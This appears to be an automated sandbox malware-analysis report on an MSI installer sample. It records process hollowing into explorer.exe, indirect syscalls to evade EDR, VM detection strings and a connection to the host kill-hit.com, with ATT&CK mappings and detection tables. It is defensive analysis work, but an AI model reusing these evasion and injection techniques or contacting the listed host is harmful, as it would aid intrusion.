Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCCED8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7AACCCED8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACFF850 FindFirstFileExA,5_2_00007FF7AACFF850
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A430 TryEnterCriticalSection,TerminateThread,SetThreadpoolStackInformation,SetConsoleHistoryInfo,PrefetchVirtualMemory,GetQueuedCompletionStatusEx,SystemTimeToFileTime,GetExitCodeProcess,CreateSymbolicLinkTransactedW,FindFirstFileW,LoadModule,OpenFile,OpenThread,SetFileTime,WaitForThreadpoolWorkCallbacks,FreeLibraryAndExitThread,PowerCreateRequest,InterlockedPushListSListEx,LocalFileTimeToFileTime,FindCloseChangeNotification,CreateThreadpoolCleanupGroup,QueryFullProcessImageNameW,Wow64GetThreadSelectorEntry,IsValidNLSVersion,FreeLibraryAndExitThread,CreateEventExW,SetPriorityClass,IsValidNLSVersion,RegisterApplicationRecoveryCallback,GetFileSize,GlobalFree,GetFileMUIInfo,SetConsoleActiveScreenBuffer,LCIDToLocaleName,7_2_00007FFDA378A430
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785730 SetFocus,CreateFileTransactedW,GetWindowContextHelpId,VirtualAlloc,FindNextVolumeMountPointW,OpenWaitableTimerW,FindNextStreamW,AddSIDToBoundaryDescriptor,EnterCriticalSection,DeleteSynchronizationBarrier,RemoveDirectoryTransactedW,LogicalToPhysicalPoint,OpenClipboard,SetWindowRgn,GetCommProperties,ShowCursor,GetFileBandwidthReservation,VirtualAlloc,GetProcessHeap,DeleteTimerQueueTimer,WriteTapemark,GlobalHandle,SetStdHandle,CreateTimerQueueTimer,GetProcessVersion,ReadConsoleOutputW,FindFirstFileW,GetProcessVersion,GetConsoleTitleW,HeapAlloc,7_2_00007FFDA3785730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA37872D0 RegisterClassW,CreateWindowExW,ShowWindow,UpdateWindow,FindFirstFileW,FindClose,GetTempPathW,GetFileAttributesW,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,CreateSolidBrush,FillRect,DeleteObject,GetObjectW,GetDIBits,SelectObject,DeleteDC,DeleteObject,CreateDirectoryW,type_info::_name_internal_method,GetMessageW,TranslateMessage,DispatchMessageW,7_2_00007FFDA37872D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38345D4 FindFirstFileExW,7_2_00007FFDA38345D4
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C12159 FindFirstFileExW,11_2_00C12159
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785FA0 DebugActiveProcessStop,HeapSetInformation,SetFileIoOverlappedRange,WaitForThreadpoolIoCallbacks,GetLastError,ApplicationRecoveryFinished,DuplicateHandle,Wow64EnableWow64FsRedirection,GetNumaProcessorNodeEx,HeapReAlloc,SetFileAttributesW,GetNumaNodeNumberFromHandle,FindClose,GetModuleHandleW,GetLargestConsoleWindowSize,CopyFile2,LocalAlloc,GetCommConfig,AddResourceAttributeAce,SetThreadDesktop,EndMenu,GetTopWindow,SetCursorPos,AttachThreadInput,FlashWindowEx,DdeQueryNextServer,GetPhysicallyInstalledSystemMemory,QueryMemoryResourceNotification,MoveFileExW,SetThreadIdealProcessor,FlashWindow,CreateDialogParamW,SetTapePosition,SetThreadAffinityMask,DeleteMenu,IsDBCSLeadByte,FlashWindowEx,GetSystemInfo,PaintDesktop,SleepConditionVariableCS,ResolveLocaleName,IsWow64Process,GetLogicalProcessorInformation,SetFileBandwidthReservation,DeviceIoControl,FileTimeToLocalFileTime,FindResourceExW,AllocateUserPhysicalPages,WaitForThreadpoolTimerCallbacks,LoadLibraryW,GetCurrentProcess,FindClose,EnumResourceLanguagesW,ConvertThreadToFiberEx,EnumDateFormatsExW,ReadDirectoryChangesW,GetConsoleAliasesLengthW,FindNextVolumeMountPointW,7_2_00007FFDA3785FA0
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2315188964.000001D153220000.00000004.00001000.00020000.00000000.sdmp, obs-ffmpeg-mux.exe, 00000007.00000002.2315129206.000001D153170000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |PIPE|vbOXtRAYipc d
Source: explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |vbOXgUEST ||
Source: classes.jsa.2.drBinary or memory string: [Ljava/lang/VirtualMachineError;
Source: classes.jsa.2.drBinary or memory string: ,jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2326785273.00007FFD9209A000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vmncVMware Screen Codec / VMware Video @!
Source: classes.jsa.2.drBinary or memory string: ()Ljdk/vm/ci/runtime/JVMCICompiler;
Source: classes.jsa.2.drBinary or memory string: VirtualMachineError.java
Source: K064a7Rfk7.msiBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: explorer.exe, 0000000B.00000002.2323519946.0000000000788000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323519946.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: classes.jsa.2.drBinary or memory string: jdk/vm/ci/common/JVMCIError
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.services.JVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.hotspot.aarch64.AArch64HotSpotJVMCIBackendFactory
Source: avcodec-60.dll.2.drBinary or memory string: vmncVMware Screen Codec / VMware Video @
Source: classes.jsa.2.drBinary or memory string: &jdk.vm.ci.services.JVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: ()Ljdk/vm/ci/runtime/JVMCIRuntime;
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2315188964.000001D153220000.00000004.00001000.00020000.00000000.sdmp, obs-ffmpeg-mux.exe, 00000007.00000002.2315129206.000001D153170000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |vbOXmINIrDRdn ||
Source: classes.jsa.2.drBinary or memory string: java/lang/VirtualMachineError.class
Source: classes.jsa.2.drBinary or memory string: 7jdk.vm.ci.hotspot.amd64.AMD64HotSpotJVMCIBackendFactory
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2315188964.000001D153220000.00000004.00001000.00020000.00000000.sdmp, obs-ffmpeg-mux.exe, 00000007.00000002.2315129206.000001D153170000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |vbOXtRAYipc ||
Source: classes.jsa.2.drBinary or memory string: <"()Ljdk/vm/ci/runtime/JVMCIRuntime;
Source: classes.jsa.2.drBinary or memory string: [Ljava/lang/VirtualMachineError;
Source: classes.jsa.2.drBinary or memory string: java/lang/VirtualMachineError
Source: classes.jsa.2.drBinary or memory string: org.graalvm.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: %jdk/vm/ci/hotspot/HotSpotJVMCIRuntime
Source: UnRar.exe, 00000005.00000003.2301496595.000001966AD82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7KqemUeu
Source: classes.jsa.2.drBinary or memory string: jdk/vm/ci/hotspot/HotSpotJVMCIRuntime
Source: classes.jsa.2.drBinary or memory string: ;jdk.vm.ci.hotspot.aarch64.AArch64HotSpotJVMCIBackendFactory
Source: classes.jsa.2.drBinary or memory string: jdk/vm/ci/runtime/JVMCI
Source: classes.jsa.2.drBinary or memory string: )()Ljdk/vm/ci/hotspot/HotSpotJVMCIRuntime;
Source: classes.jsa.2.drBinary or memory string: UG#java/lang/VirtualMachineError.class
Source: classes.jsa.2.drBinary or memory string: #()Ljdk/vm/ci/runtime/JVMCICompiler;
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: classes.jsa.2.drBinary or memory string: jdk.vm.ci.hotspot.amd64.AMD64HotSpotJVMCIBackendFactory
Source: classes.jsa.2.drBinary or memory string: <org.graalvm.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: classes.jsa.2.drBinary or memory string: Ljava/lang/VirtualMachineError;
Source: avcodec-60.dll.2.drBinary or memory string: VMware Screen Codec / VMware Video
Source: classes.jsa.2.drBinary or memory string: ()Ljdk/vm/ci/hotspot/HotSpotJVMCIRuntime;
Source: C:\Windows\SysWOW64\explorer.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D90 Start: 00007FFD9370300F End: 00007FFD93702E857_2_00007FFD93702D90
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D90 rdtsc 7_2_00007FFD93702D90
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF1D78 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7AACF1D78
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EED32 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,7_2_00007FFD936EED32
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C049A0 mov ecx, dword ptr fs:[00000030h]11_2_00C049A0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AAD00C90 GetProcessHeap,5_2_00007FF7AAD00C90
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF1F20 SetUnhandledExceptionFilter,5_2_00007FF7AACF1F20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF110C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7AACF110C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF1D78 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7AACF1D78
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF61D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7AACF61D8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E743E04 SetUnhandledExceptionFilter,7_2_00007FF71E743E04
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E743C5C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF71E743C5C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FF71E743774 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF71E743774
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38267D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFDA38267D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3818848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FFDA3818848
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3818594 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFDA3818594
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeCode function: 8_2_00007FF7C76D3074 SetUnhandledExceptionFilter,8_2_00007FF7C76D3074
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeCode function: 8_2_00007FF7C76D2ECC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7C76D2ECC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeCode function: 8_2_00007FF7C76D2984 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7C76D2984
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C08864 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00C08864
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C0C95A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00C0C95A
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C084B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00C084B1
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C08641 SetUnhandledExceptionFilter,11_2_00C08641

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.37.86 80Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: C00000 protect: page execute and read and writeJump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeNtUnmapViewOfSection: Indirect: 0x1D153140E1BJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeNtQueryInformationProcess: Indirect: 0x1D153140CB3Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeNtResumeThread: Indirect: 0x1D15314144EJump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: C00000 value starts with: 4D5AJump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory written: PID: 524 base: C00000 value: 4DJump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: C00000Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: C00000Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE2350 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00007FF7AACE2350
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE22D8 cpuid 5_2_00007FF7AACE22D8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: SetThreadErrorMode,SetEventWhenCallbackReturns,AddDllDirectory,FindVolumeClose,GetOEMCP,ClearCommError,WriteProfileStringW,CreatePrivateNamespaceW,DeleteAtom,GetNumaNodeProcessorMask,GetCommConfig,SearchPathW,SetFileCompletionNotificationModes,BackupRead,GetTimeZoneInformation,GetMetaFileW,GetPrivateProfileSectionW,GetMaximumProcessorCount,SignalObjectAndWait,GetThreadIdealProcessorEx,DeleteTimerQueueEx,GetTextExtentPointI,LockResource,FindNextVolumeW,GlobalReAlloc,GlobalAlloc,ExtSelectClipRgn,GetEnhMetaFilePaletteEntries,DeleteTimerQueue,ChangeTimerQueueTimer,VerifyScripts,ClosePrivateNamespace,GetSystemPowerStatus,GetModuleHandleW,IsBadStringPtrW,GetNearestPaletteIndex,SetSearchPathMode,ReadConsoleOutputCharacterW,SetCalendarInfoW,LocaleNameToLCID,InitializeConditionVariable,GetWinMetaFileBits,GetLocaleInfoW,FindNextVolumeMountPointW,EnumTimeFormatsEx,SetFileTime,GetTimeFormatW,GetCharABCWidthsFloatW,LeaveCriticalSectionWhenCallbackReturns,WaitForThreadpoolWorkCallbacks,7_2_00007FFDA378C6E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: FreeDDElParam,OpenSemaphoreW,GetThreadGroupAffinity,GetVolumeNameForVolumeMountPointW,FrameRect,WaitForMultipleObjectsEx,GetSystemTimes,WideCharToMultiByte,VirtualProtect,GetTempPathW,GetNamedPipeClientSessionId,SystemTimeToTzSpecificLocalTimeEx,GetProcessHandleCount,SetThreadStackGuarantee,LocalFlags,GetFileMUIInfo,SystemTimeToFileTime,LocalHandle,SetProcessPriorityBoost,EnumResourceTypesExW,TzSpecificLocalTimeToSystemTimeEx,GetLocaleInfoW,SetConsoleActiveScreenBuffer,WaitForDebugEvent,GetConsoleTitleW,GetThreadTimes,GetNamedPipeHandleStateW,InitializeConditionVariable,SetConsoleActiveScreenBuffer,VirtualProtect,GlobalFree,GetConsoleTitleW,VerSetConditionMask,GetCPInfo,FreeLibrary,SetCurrentConsoleFontEx,SetThreadDescription,GetUserDefaultLCID,SetLocalTime,HeapQueryInformation,FlsAlloc,GetLastError,GetThreadErrorMode,WaitForThreadpoolWaitCallbacks,GetDiskFreeSpaceExW,GlobalMemoryStatus,WriteProfileSectionW,AddIntegrityLabelToBoundaryDescriptor,CancelSynchronousIo,GetDriveTypeW,7_2_00007FFDA37890E0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: EnumSystemLocalesW,7_2_00007FFDA382F94C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: GetLocaleInfoW,7_2_00007FFDA382FDCC
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,7_2_00007FFDA383818C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00007FFDA3838650
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: EnumSystemLocalesW,7_2_00007FFDA38385B8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: EnumSystemLocalesW,7_2_00007FFDA38384E8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00007FFDA3838BD4
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: GetLocaleInfoW,7_2_00007FFDA3838AA0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_00007FFDA38389F0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: GetLocaleInfoW,7_2_00007FFDA3838898
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACF1F8C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00007FF7AACF1F8C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93779720 GetTimeZoneInformation,GetSystemTimeAsFileTime,7_2_00007FFD93779720
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACDAFB4 RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetVersionExW,LoadLibraryExW,_invalid_parameter_noinfo_noreturn,5_2_00007FF7AACDAFB4

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		1
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		14
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Shared Modules		1
Windows Service		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Clipboard Data		2
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
Command and Scripting Interpreter		Logon Script (Windows)1
Access Token Manipulation		1
Abuse Elevation Control Mechanism		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Windows Service		3
Obfuscated Files or Information		NTDS36
System Information Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script611
Process Injection		1
Timestomp		LSA Secrets231
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSync1
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Masquerading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd611
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591347 Sample: K064a7Rfk7.msi Startdate: 14/01/2025 Architecture: WINDOWS Score: 92 45 kill-hit.com 2->45 49 Multi AV Scanner detection for dropped file 2->49 51 AI detected suspicious sample 2->51 53 Potentially malicious time measurement code found 2->53 8 msiexec.exe 135 101 2->8         started        11 msiexec.exe 2 2->11         started        signatures3 process4 file5 37 C:\Windows\Installer\MSIE336.tmp, PE32 8->37 dropped 39 C:\Windows\Installer\MSIE289.tmp, PE32 8->39 dropped 41 C:\Windows\Installer\MSIE249.tmp, PE32 8->41 dropped 43 49 other files (10 malicious) 8->43 dropped 13 obs-ffmpeg-mux.exe 1 1 8->13         started        16 msiexec.exe 8->16         started        18 UnRar.exe 3 8->18         started        21 createdump.exe 1 8->21         started        process6 file7 57 Injects code into the Windows Explorer (explorer.exe) 13->57 59 Writes to foreign memory regions 13->59 61 Allocates memory in foreign processes 13->61 65 3 other signatures 13->65 23 explorer.exe 13->23         started        27 conhost.exe 13->27         started        29 WerFault.exe 2 13->29         started        63 Query firmware table information (likely to detect VMs) 16->63 35 C:\Users\user\AppData\Roaming\...\obs.dll, PE32+ 18->35 dropped 31 conhost.exe 18->31         started        33 conhost.exe 21->33         started        signatures8 process9 dnsIp10 47 kill-hit.com 104.21.37.86, 49779, 80 CLOUDFLARENETUS United States 23->47 55 System process connects to network (likely due to code injection or exploit) 23->55 signatures11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
K064a7Rfk7.msi5%VirustotalBrowse
K064a7Rfk7.msi5%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-2-0.dll0%ReversingLabs
